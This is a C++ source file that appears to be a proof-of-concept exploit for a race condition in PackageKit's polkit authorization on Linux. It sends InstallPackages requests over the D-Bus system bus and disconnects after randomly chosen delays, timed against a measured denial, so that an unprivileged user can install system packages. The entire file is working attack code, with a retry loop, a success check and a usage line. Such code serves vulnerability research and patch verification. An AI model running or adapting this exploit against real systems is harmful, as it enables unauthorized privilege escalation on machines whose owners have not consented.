#include "dbus_utils.hpp"
#include "dbus_auth.hpp"
#include "parse.hpp"
#include "utils.hpp"
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/stat.h>
#include <sys/un.h>
#include <crypt.h>
#include <errno.h>
#include <spawn.h>
#include <signal.h>
#include <string.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <cstdint>
#include <functional>
#include <memory>
#include <random>
#include <utility>
#include <assert.h>

class DBusSocket : public AutoCloseFD {
public:
  DBusSocket(const uid_t uid, const char* filename) :
    AutoCloseFD(socket(AF_UNIX, SOCK_STREAM, 0))
  {
    if (get() < 0) {
      throw ErrorWithErrno("Could not create socket");
    }

    sockaddr_un address;
    memset(&address, 0, sizeof(address));
    address.sun_family = AF_UNIX;
    strcpy(address.sun_path, filename);

    if (connect(get(), (sockaddr*)(&address), sizeof(address)) < 0) {
      throw ErrorWithErrno("Could not connect socket");
    }

    dbus_sendauth(uid, get());

    dbus_send_hello(get());
    std::unique_ptr<DBusMessage> hello_reply1 = receive_dbus_message(get());
    std::string name = hello_reply1->getBody().getElement(0)->toString().getValue();
    std::unique_ptr<DBusMessage> hello_reply2 = receive_dbus_message(get());
  }
};

static void send_AddMatch(
  const int fd,
  const char* objectpath,
  const char* member,
  const uint32_t serialNumber
) {
  dbus_method_call(
    fd,
    serialNumber,
    DBusMessageBody::mk1(
      DBusObjectString::mk(
        _s("type='signal',sender='org.freedesktop.PackageKit',") +
        _s("path='") + _s(objectpath) +
        _s("',member='") + _s(member) + "'"
      )
    ),
    _s("/org/freedesktop/DBus"),
    _s("org.freedesktop.DBus"),
    _s("org.freedesktop.DBus"),
    _s("AddMatch")
  );

  std::unique_ptr<DBusMessage> reply = receive_dbus_message(fd);
  if (reply->getHeader_messageType() != MSGTYPE_METHOD_RETURN) {
    throw Error("AddMatch returned an error.");
  }
}

static std::string send_PackageKit_CreateTransaction(
  const int fd,
  const uint32_t serialNumber
) {
  dbus_method_call(
    fd,
    serialNumber,
    DBusMessageBody::mk0(),
    _s("/org/freedesktop/PackageKit"),
    _s("org.freedesktop.PackageKit"),
    _s("org.freedesktop.PackageKit"),
    _s("CreateTransaction")
  );

  std::unique_ptr<DBusMessage> reply = receive_dbus_message(fd);

  if (reply->getHeader_messageType() != MSGTYPE_METHOD_RETURN) {
    throw Error("FindUserByName returned an error.");
  }

  return reply->getBody().getElement(0)->toPath().getValue();
}

void send_PackageKit_InstallPackage(
  const int fd,
  const char* objectpath,
  const char* packagename,
  const uint32_t serialNumber
) {
  dbus_method_call(
    fd,
    serialNumber,
    DBusMessageBody::mk(
      _vec<std::unique_ptr<DBusObject>>(
        DBusObjectUint64::mk(0x2),
        DBusObjectArray::mk1(
          _vec<std::unique_ptr<DBusObject>>(
            DBusObjectString::mk(_s(packagename))
          )
        )
      )
    ),
    _s(objectpath),
    _s("org.freedesktop.PackageKit.Transaction"),
    _s("org.freedesktop.PackageKit"),
    _s("InstallPackages")
  );
}

static void send_PackageKit_SearchName(
  const int fd,
  const char* objectpath,
  const char* packagename,
  const uint32_t serialNumber
) {
  dbus_method_call(
    fd,
    serialNumber,
    DBusMessageBody::mk(
      _vec<std::unique_ptr<DBusObject>>(
        DBusObjectUint64::mk(0),
        DBusObjectArray::mk1(
          _vec<std::unique_ptr<DBusObject>>(
            DBusObjectString::mk(_s(packagename))
          )
        )
      )
    ),
    _s(objectpath),
    _s("org.freedesktop.PackageKit.Transaction"),
    _s("org.freedesktop.PackageKit"),
    _s("SearchNames")
  );
}

// Most of the PackageKit methods take a "package_id" as an argument. This
// is an example of a package_id:
//
//   bash;5.1-2ubuntu1;amd64;installed:ubuntu-hirsute-main
//
// This function calls the "SearchName" method to find the correct
// package_id for the package that we want to install. The SearchName
// method is a bit annoying to use because it uses signals to reply. So we
// have to use "AddMatch" to intercept the reply.
static std::string lookup_package_id(
  const uid_t uid,
  const char* socket_filename,
  const char* packagename,
  bool* is_installed // out parameter
) {
  DBusSocket fd(uid, socket_filename);

  *is_installed = false;

  std::string transaction_id =
    send_PackageKit_CreateTransaction(fd.get(), 1001);
  printf("lookup_package_id: transaction_id = %s\n", transaction_id.c_str());

  // Add listeners for the "Package" and "Finished" signals.
  send_AddMatch(fd.get(), transaction_id.c_str(), "Package", 1002);
  send_AddMatch(fd.get(), transaction_id.c_str(), "Finished", 1002);

  // Call the method.
  send_PackageKit_SearchName(fd.get(), transaction_id.c_str(), packagename, 1003);

  // Loop until we receive the "Package" signal or the "Finished" signal.
  while (true) {
    std::unique_ptr<DBusMessage> signal = receive_dbus_message(fd.get());

    if (signal->getHeader_messageType() == MSGTYPE_METHOD_RETURN) {
      // Ignore. The SearchName method sends a reply containing no
      // useful information.
    } else if (signal->getHeader_messageType() == MSGTYPE_SIGNAL) {
      const char* member =
        signal->getHeader_lookupField(MSGHDR_MEMBER).getValue()->toString().getValue().c_str();
      if (strcmp(member, "Package") == 0) {
        const char* package_id =
          signal->getBody().getElement(1)->toString().getValue().c_str();
        printf("package_id: %s\n", package_id);
        const size_t packagename_len = strlen(packagename);
        if (strncmp(packagename, package_id, packagename_len) == 0) {
          if (package_id[packagename_len] == ';') {
            uint32_t info = signal->getBody().getElement(0)->toUint32().getValue();
            if (info == 1) {
              *is_installed = true;
            }
            return _s(package_id);
          }
        }
      } else if (strcmp(member, "Finished") == 0) {
        throw Error("lookup_package_id failed: package not found");
      } else {
        throw Error("lookup_package_id failed: unexpected signal type");
      }
    } else {
      throw Error("lookup_package_id failed: unexpected message type");
    }
  }
}

// Record the amount of time it takes to get a response from the
// InstallPackage method. The response will be an error because
// it will be denied by polkit. This response time gives us an upper
// bound on how long we need to wait before disconnecting when we
// attempt to trigger the bug.
static long record_time_InstallPackage(
  const uid_t uid,
  const char* socket_filename,
  const char* package_id
) {
  DBusSocket fd(uid, socket_filename);

  std::string transaction_id =
    send_PackageKit_CreateTransaction(fd.get(), 1001);
  printf("record_time_InstallPackage: transaction_id = %s\n", transaction_id.c_str());

  // Start a timer.
  timespec starttime;
  clock_gettime(CLOCK_MONOTONIC, &starttime);

  send_PackageKit_InstallPackage(fd.get(), transaction_id.c_str(), package_id, 1003);
  std::unique_ptr<DBusMessage> reply = receive_dbus_message(fd.get());

  // Stop the timer.
  timespec endtime;
  clock_gettime(CLOCK_MONOTONIC, &endtime);

  // Calculate the time difference.
  long diff =
    (1000000000 * (endtime.tv_sec - starttime.tv_sec)) +
    (endtime.tv_nsec - starttime.tv_nsec);

  return diff;
}

// This function calls the InstallPackage method, but doesn't wait for the
// reply. Instead it disconnects from D-Bus after the specified number of
// nanoseconds. If we get lucky with the timing of the delay, it will
// hopefully trigger the bug and bypass polkit.
static void attempt_InstallPackage_with_disconnect(
  const uid_t uid,
  const char* socket_filename,
  const char* package_id,
  const long delay
) {
  DBusSocket fd(uid, socket_filename);

  std::string transaction_id =
    send_PackageKit_CreateTransaction(fd.get(), 1001);
  printf("attempt_InstallPackage_with_disconnect: transaction_id = %s\n", transaction_id.c_str());

  timespec duration;
  duration.tv_sec = delay / 1000000000;
  duration.tv_nsec = delay % 1000000000;

  send_PackageKit_InstallPackage(fd.get(), transaction_id.c_str(), package_id, 1003);
  clock_nanosleep(CLOCK_MONOTONIC, 0, &duration, 0);

  // Returning from this function automatically disconnects us from D-Bus
  // because DBusSocket's destructor closes the file descriptor.
}

// Keep trying `attempt_InstallPackage_with_disconnect` with different
// delay values until the exploit succeeds (or we decide to give up).
static void exploit_InstallPackage(
  const uid_t uid,
  const char* socket_filename,
  const char* packagename
) {
  bool is_installed = false;
  std::string package_id =
    lookup_package_id(uid, socket_filename, packagename, &is_installed);
  if (is_installed) {
    printf("Package %s is already installed.\n", packagename);
    return;
  }

  // First measure how long a regular CreateUser method call takes.
  const long elapsed =
    record_time_InstallPackage(uid, socket_filename, package_id.c_str());
  printf("Elapsed time: %ld nanoseconds\n", elapsed);

  // Random number generator which will generate random
  // pause times in the range 0 .. 2*elapsed.
  std::random_device rd;
  std::mt19937 gen(rd());
  std::uniform_int_distribution<long> distrib(0, 2*elapsed);

  // If it doesn't succeed after 1000 attempts then it probably
  // isn't going to work.
  for (size_t i = 0; i < 1000; i++) {
    const long delay = distrib(gen);
    attempt_InstallPackage_with_disconnect(uid, socket_filename, package_id.c_str(), delay);

    // Check if the package has been installed.
    bool is_installed = false;
    lookup_package_id(uid, socket_filename, packagename, &is_installed);
    if (is_installed) {
      printf("Success!\n");
      return;
    }
  }

  throw Error("Failed to install package.");
}

int main(int argc, char* argv[]) {
  const char* progname = argc > 0 ? argv[0] : "a.out";
  if (argc != 3) {
    fprintf(
      stderr,
      "usage:   %s <unix socket path> <package name>\n"
      "example: %s /var/run/dbus/system_bus_socket gnome-control-center\n",
      progname,
      progname
    );
    return EXIT_FAILURE;
  }

  const uid_t uid = getuid();
  const char* socket_filename = argv[1];
  const char* packagename = argv[2];

  exploit_InstallPackage(uid, socket_filename, packagename);

  return EXIT_SUCCESS;
}
